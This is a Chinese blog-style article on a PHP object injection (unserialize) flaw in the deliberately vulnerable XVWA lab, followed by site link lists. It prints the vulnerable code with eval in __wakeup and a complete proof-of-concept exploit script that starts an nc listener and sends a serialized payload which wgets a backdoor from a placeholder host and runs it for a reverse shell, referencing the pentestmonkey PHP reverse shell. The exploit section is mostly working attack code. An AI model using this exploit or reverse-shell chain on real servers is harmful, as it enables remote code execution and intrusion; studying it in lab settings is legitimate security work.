首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

PHP序列化/对象注入漏洞分析

Posted in PHP onApril 18, 2016

本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell。

如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作。

漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化。为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在 这里 。它会被动检测PHP和Java序列化的存在。

分析
我们检测到了应用里使用了PHP序列化,所以我们可以开始确认应用代码里是否含有远程代码执行漏洞。需要注意的是,序列化对象是从参数“r”取来的:

$var1=unserialize($_REQUEST['r']);
然后再进行反序列化和eval:

eval($this->inject);
接着,执行:

echo "<br/>".$var1[0]." - ".$var1[1];
有了这些,如果我们绕过了参数r的PHP序列化对象,那么就可以获得代码执行漏洞了!

< ?php 
  error_reporting(E_ALL);
  class PHPObjectInjection{
    public $inject;
 
    function __construct(){
 
    }
 
    function __wakeup(){
      if(isset($this->inject)){
        eval($this->inject);
      }
    }
  }
//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";}
  if(isset($_REQUEST['r'])){ 
 
    $var1=unserialize($_REQUEST['r']);
    
 
    if(is_array($var1)){ 
      echo "
".$var1[0]." - ".$var1[1];
    }
  }else{
    echo "parameter is missing";
  }
? >

漏洞利用
为了利用这个漏洞,我们创建了一个简单的PHP脚本来自动生成PHP序列化payload,以及在目标远程主机上运行我们想要的命令。然后,我创建了一个通用的PHP反弹shell,下载地址如下:

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
注意: 你需要把这个文件传到web服务器上,改动反弹shell脚本里面的本地ip和端口,以及下面的利用代码:

<?php 
/*
PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.com
A simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access. 
Shouts to @jstnkndy @yappare for theassist!
NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured
*/
print"==============================================================================\r\n";
print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print"==============================================================================\r\n";
print "[+] Generating serializedpayload...[OK]\r\n";
print "[+] Launching reverselistener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp1234\'');
class PHPObjectInjection
{
  //CHANGE URL/FILENAME TO MATCH YOUR SETUP
 public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
 
$url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER
$url = $url . urlencode(serialize(newPHPObjectInjection));
print "[+] Sendingexploit...[OK]\r\n";
print "[+] Dropping down tointeractive shell...[OK]\r\n";
print"==============================================================================\r\n";
$response =file_get_contents("$url");
 
? >

Demo
现在咱们的利用脚本已经就绪,我们可以执行它来得到远程主机上的反弹shell,用来远程执行命令!

以上就是本文的全部内容,希望对大家学习php程序设计有所帮助。

PHP序列化/对象注入漏洞分析

- Author -

lijiao

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
如何过滤高亮显示非法字符
Oct 09 PHP
发挥语言的威力--融合PHP与ASP
Oct 09 PHP
PHP解析目录路径的3个函数总结
Nov 18 PHP
PHP使用CURL实现多线程抓取网页
Apr 30 PHP
php操作redis缓存方法分享
Jun 03 PHP
PHP获取昨天、今天及明天日期的方法
Feb 03 PHP
Yii2 批量插入、更新数据实例
Mar 15 PHP
PHP 网站修改默认访问文件的nginx配置
May 27 PHP
PHPstorm快捷键(分享)
Jul 17 PHP
PHP使用SMTP邮件服务器发送邮件示例
Aug 28 PHP
laravel 实现划分admin和home 模块分组
Oct 15 PHP
浅谈如何提高PHP代码质量之端到端集成测试
May 28 PHP
php实现三级级联下拉框
Apr 17 #PHP
PHP加密3DES报错 Call to undefined function: mcrypt_module_open() 如何解决
Apr 17 #PHP
orm获取关联表里的属性值
Apr 17 #PHP
ThinkPHP框架搭建及常见问题(XAMPP安装失败、Apache/MySQL启动失败)
Apr 15 #PHP
php基于jquery的ajax技术传递json数据简单实例
Apr 15 #PHP
PHP6连接SQLServer2005的三部曲
Apr 15 #PHP
php使用pear_smtp发送邮件
Apr 15 #PHP
索尼ICF-36(1) SnakeGame(1) mediapipe(1) while(1) cvzone(1) 计算机视觉(2) 贪吃蛇(2) python小游戏(5) 德生2P3(1) for(1)
You might like
PHP函数常用用法小结
2010/02/08 PHP
9个PHP开发常用功能函数小结
2011/07/15 PHP
PHP通过正则表达式下载图片到本地的实现代码
2011/09/19 PHP
ThinkPHP整合百度Ueditor图文教程
2014/10/21 PHP
PHP中使用php://input处理相同name值的表单数据
2015/02/03 PHP
PHP传值到不同页面的三种常见方式及php和html之间传值问题
2015/11/19 PHP
php使用ftp远程上传文件类(完美解决主从文件同步问题的方法)
2016/09/23 PHP
centos+php+coreseek+sphinx+mysql之一coreseek安装篇
2016/10/25 PHP
ThinkPHP5.1+Ajax实现的无刷新分页功能示例
2020/02/10 PHP
JavaScript Perfection kill 测试及答案
2010/03/23 Javascript
自己用jQuery写了一个图片的马赛克消失效果
2014/05/04 Javascript
js 通过html()及text()方法获取并设置p标签的显示值
2014/05/14 Javascript
深入浅析JavaScript中prototype和proto的关系
2015/11/15 Javascript
AngularJS中过滤器的使用与自定义实例代码
2016/09/17 Javascript
AngularJS 中使用Swiper制作滚动图不能滑动的解决方法
2016/11/15 Javascript
JS优化与惰性载入函数实例分析
2017/04/06 Javascript
Express + Node.js实现登录拦截器的实例代码
2017/07/01 Javascript
基于js原生和ajax的get和post方法以及jsonp的原生写法实例
2017/10/16 Javascript
vue利用better-scroll实现轮播图与页面滚动详解
2017/10/20 Javascript
jquery ztree实现右键收藏功能
2017/11/20 jQuery
九步学会Python装饰器
2015/05/09 Python
基于Python如何使用AIML搭建聊天机器人
2016/01/27 Python
python实现批量监控网站
2016/09/09 Python
详解如何用django实现redirect的几种方法总结
2018/11/22 Python
PyQt5图形界面播放音乐的实例
2019/06/17 Python
pandas通过字典生成dataframe的方法步骤
2019/07/23 Python
python对Excel的读取的示例代码
2020/02/14 Python
html5 利用canvas手写签名并保存的实现方法
2018/07/12 HTML / CSS
装修五一活动策划案
2014/01/23 职场文书
关于梦想的演讲稿
2014/05/05 职场文书
走进毛泽东观后感
2015/06/04 职场文书
2015年信息技术教研组工作总结
2015/07/22 职场文书
老人院义工活动感想
2015/08/07 职场文书
教你如何使用Python下载B站视频的详细教程
2021/04/29 Python
使用goaccess分析nginx日志的详细方法
2021/07/09 Servers
HTML5 语义化标签(移动端必备)
2021/08/23 HTML / CSS